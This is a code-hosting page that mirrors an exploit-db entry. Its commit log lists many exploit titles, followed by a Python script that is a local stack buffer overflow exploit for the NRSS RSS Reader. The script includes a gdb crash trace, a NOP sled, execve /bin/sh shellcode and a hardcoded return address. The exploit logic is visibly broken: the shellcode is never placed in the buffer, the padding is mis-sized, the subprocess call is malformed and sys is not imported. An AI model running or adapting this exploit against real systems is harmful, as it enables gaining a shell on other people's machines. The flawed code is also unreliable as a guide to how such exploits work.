bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux/local/39810.py
Offensive Security 5e229672a0 DB: 2016-05-14 
3 new exploits

Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit
Ethereal 0.10.10 / tcpdump 3.9.1 (rsvp_print) Infinite Loop Denial of Service Exploit

Mozilla Firefox - Install Method Remote Arbitrary Code Execution Exploit
Mozilla Firefox 1.0.3 - Install Method Remote Arbitrary Code Execution Exploit

Active Price Comparison 4 - (ProductID) Blind SQL Injection Vulnerability

Absolute Form Processor XE-V 1.5 - (auth Bypass) SQL Injection Vulnerability

ipsec-tools racoon frag-isakmp Denial of Service PoC
IPsec-Tools < 0.7.2 (racoon frag-isakmp) - Multiple Remote Denial of Service PoC
PaoBacheca Guestbook 2.1 (login_ok) Auth Bypass Vulnerability
PaoLiber 1.1 (login_ok) Authentication Bypass Vulnerability
PaoBacheca Guestbook 2.1 - (login_ok) Auth Bypass Vulnerability
PaoLiber 1.1 - (login_ok) Authentication Bypass Vulnerability
IPsec-Tools < 0.7.2 - Multiple Remote Denial of Service Vulnerabilities
ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability

I-net Multi User Email Script SQLi Vulnerability

linux/x86 - break chroot execve /bin/sh 80 bytes
linux/x86 - break chroot execve /bin/sh (80 bytes)

Sysax Multi Server 5.64 - Create Folder Buffer Overflow

TikiWiki Project 1.8 tiki-read_article.php articleId Parameter XSS
TikiWiki Project 1.8 - tiki-read_article.php articleId Parameter XSS

TikiWiki Project 1.8 tiki-print_article.php articleId Parameter XSS
TikiWiki Project 1.8 - tiki-print_article.php articleId Parameter XSS
TikiWiki Project 1.8 tiki-list_faqs.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 tiki-list_trackers.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_faqs.php sort_mode Parameter SQL Injection
TikiWiki Project 1.8 - tiki-list_trackers.php sort_mode Parameter SQL Injection
UBBCentral UBB.threads 6.2.3/6.5 login.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 online.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter XSS
UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter XSS

CityPost PHP Image Editor M1 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M2 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M3 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor Imgsrc URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M4 URI Parameter Cross-Site Scripting Vulnerability
CityPost PHP Image Editor M1/M2/M3/Imgsrc/M4 - URI Parameter Cross-Site Scripting Vulnerability
osCommerce 2.2 admin/countries.php page Parameter XSS
osCommerce 2.2 admin/currencies.php page Parameter XSS
osCommerce 2.2 - admin/countries.php page Parameter XSS
osCommerce 2.2 - admin/currencies.php page Parameter XSS
Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (1)
Microsoft Internet Explorer 6.0 Unspecified Code Execution Vulnerability (2)
Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (1)
Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (2)

Joomla Gallery WD - SQL Injection Vulnerability

Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities
Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities
Photoshop CC2014 and Bridge CC 2014 - .PNG Parsing Memory Corruption Vulnerabilities
NRSS Reader 0.3.9 - Local Stack-Based Overflow
runAV mod_security - Arbitrary Command Execution
Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read
2016-05-14 05:03:47 +00:00

58 lines
2 KiB
Python
Executable file
Raw Blame History

# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: NRSS RSS Reader
# Version: 0.3.9-1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: NRSS is a console based RSS reader allowing
# uses to read and manage RSS feeds
# Kali Linux 2.0 package: pool/main/n/nrss/nrss_0.3.9-1_i386.deb
# MD5sum: 27d997c89340ebb6f4a1d9e1eb28ea39
# Website: http://www.codezen.org/nrss/
#
# gdb$ run -F $(python -c 'print "A"*256+"DCBA"')
# Starting program: /usr/bin/nrss -F $(python -c 'print "A"*256+"DCBA"')
#
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000000 EBX: 0x41414141 ECX: 0x00000000 EDX: 0x0809040C o d I t S z a p c
# ESI: 0x41414141 EDI: 0x41414141 EBP: 0x41414141 ESP: 0xBFFFED60 EIP: 0x41424344
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
# Cannot access memory at address 0x41424344
# 0x41424344 in ?? ()
import os, subprocess
def run():
try:
print "# NRSS News Reader - Stack Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 256
nopsled = "\x90"*200
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\xd0\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["nrss -F",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, NRSS Reader - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit NRSS Reader v0.3.9-1 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
Reference in a new issue View git blame Copy permalink